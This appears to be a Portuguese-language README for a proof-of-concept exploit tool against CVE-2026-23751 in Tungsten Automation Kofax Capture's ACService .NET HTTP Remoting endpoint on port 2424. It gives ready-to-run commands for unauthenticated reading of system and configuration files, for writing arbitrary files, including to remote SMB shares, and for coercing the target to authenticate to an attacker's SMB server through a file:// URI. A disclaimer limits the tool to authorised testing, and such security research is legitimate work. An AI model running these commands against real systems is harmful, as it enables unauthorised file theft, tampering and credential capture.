
RemotingClient corrigido para explorar o CVE-2026-23751 (Tungsten Automation - Kofax Capture Leitura/Gravação de Arquivos Não Autenticada e coerção SMB via .NET HTTP Remoting)
Prova de conceito que reimplementa a técnica descrita em Code White's NewRemotingTricks, direcionada ao Tungsten Automation Kofax Capture.
Título: Tungsten Automation - Kofax Capture Leitura/Gravação de Arquivos Não Autenticada e Coerção SMB via .NET HTTP Remoting
CVE: CVE-2026-23751
A CVE-2026-23751 afeta o Tungsten Automation Kofax Capture e permite que um atacante remoto não autenticado interaja com um endpoint .NET HTTP Remoting exposto pelo ACService do Kofax Capture.
A vulnerabilidade pode ser explorada para realizar:
O PoC reimplementa a técnica relevante de .NET Remoting do projeto NewRemotingTricks da Code White.
O PoC tem como alvo o endpoint HTTP Remoting ACService do Kofax Capture:
http://<target>:2424/ACService
A porta 2424 é a porta padrão de HTTP Remoting usada pelo serviço afetado.
O exemplo a seguir lê o arquivo de hosts do Windows no alvo:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts
Um arquivo de configuração do Kofax Capture pode ser lido de forma semelhante:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml
Um arquivo pode ser gravado em um local acessível pelo serviço Kofax Capture fornecendo o caminho de destino seguido pelo conteúdo:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld
A mesma funcionalidade pode ser usada com um caminho UNC para gravar em um compartilhamento SMB remoto:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld
A capacidade de acessar o recurso remoto depende das permissões e do contexto de segurança do serviço Kofax Capture.
Um URI file:// pode ser fornecido para fazer com que o alvo acesse um recurso SMB remoto:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt
Isso pode fazer com que o host afetado autentique no servidor SMB controlado pelo atacante, dependendo do ambiente de destino e de sua configuração de segurança.
A vulnerabilidade envolve o uso de .NET HTTP Remoting pelo ACService do Kofax Capture.
O .NET Remoting suporta vários esquemas de URI e mecanismos de serialização de objetos. Ao interagir com o endpoint de remoting exposto de uma maneira específica, um cliente não autenticado pode fazer com que o serviço execute operações no sistema de arquivos usando caminhos fornecidos pelo cliente.
O PoC demonstra como esse comportamento pode ser usado para:
file://O PoC atualmente demonstra a gravação de dados de string em arquivos. Outros tipos de arquivo e formatos de payload podem ser suportados modificando o código-fonte de acordo.
Esta implementação é baseada em pesquisas e técnicas apresentadas em:
Code White - NewRemotingTricks
ACService do Kofax Capture do alvoRemotingClient_MBRO_Lazy.exeNenhuma autenticação no serviço Kofax Capture é necessária para a exploração.
Este repositório é fornecido apenas para fins de pesquisa de segurança, validação de vulnerabilidades e testes de penetração autorizados.
Não use este PoC contra sistemas sem autorização explícita. O autor não é responsável por danos, perda de dados, acesso não autorizado ou outras consequências resultantes do uso indevido deste software.